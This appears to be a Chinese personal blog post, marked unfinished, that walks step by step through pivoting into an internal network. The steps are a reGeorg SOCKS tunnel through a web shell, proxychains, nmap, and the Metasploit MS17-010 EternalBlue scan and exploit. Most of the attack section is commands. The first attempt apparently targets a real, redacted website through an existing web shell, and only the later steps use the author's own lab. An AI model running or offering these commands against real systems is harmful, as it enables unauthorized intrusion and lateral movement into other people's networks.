Catalog
  1. 1. reGeorg代理
  2. 2. proxychains配置修改
  3. 3. 攻击
  4. 4. 内心表示不服
    1. 4.1. 漏洞验证
    2. 4.2. ms17攻击
  • ——未完待续——
  • reGeorg+proxychains内网渗透

    最近大家都在玩内网渗透,为了跟上脚步,我也不能落后。

    受害机(server2003):192.168.10.42
    攻击机(kali)

    reGeorg代理

    这个教程,我前面的文章就有了。不做解释。

    1
    python reGeorgSocksProxy.py -u http://www.xxxxxxx.com/tunnel.aspx -p 1080

    忽略xxxxxxx

    proxychains配置修改

    打开/etc/poxychains.conf
    修改
    [ProxyList]
    socks5 127.0.0.1 1080

    攻击

    我在菜刀哪里看过,他存在192.168.10.42的内网机

    通过proxychains进行namp扫描和ping 192.168.10.42

    1
    2
    proxychains nmap -Pn -sV 192.168.10.42
    proxychains ping 192.168.10.42

    被拦截,嘤嘤嘤

    内心表示不服

    为了验证这个方法是可以进行内网渗透的
    于是我做了本地复现

    代理机(Windows2012):192.168.61.138
    受害机(Windows2008):192.168.61.100
    攻击机(Windows10)

    搭理搭建成功以后,ping 192.168.61.100 和nmap扫192.168.61.100

    ping不通了,但是nmap能扫扫。
    为什么ping不通呢,师兄给的解释是:
    ping是走的icmp协议
    socks代理不支持icmp协议。。。。
    而nmap有许多很多超级多的协议可以选择。

    嘤嘤嘤~~

    我知道
    192.168.61.100有永恒之蓝的漏洞。
    msfconsole一波。

    漏洞验证

    首先检查防火墙状态并关闭
    [root@admin ~]# proxychains msfconsole
    启动msf

    msf > search eternalblue
    搜索模块

    先扫描有漏洞主机
    msf > use auxiliary/scanner/smb/smb_ms17_010
    加载扫描模块

    msf > set rhosts 192.168.61.1/24
    设置扫描IP直接扫描C段

    msf > run
    开始扫描

    扫出提示: Host is likely VULNERABLE to MS17-010!的可以尝试利用

    ms17攻击

    proxychains msfconsole
    use exploit/windows/smb/ms17_010_eternalblue
    show options
    set RHOST 192.168.61.100
    exploit

    ——未完待续——

    Author: 九指
    Link: /2018/05/14/reGeorg+proxychains%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/
    Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
    Donate
    • 微信
    • 支付寶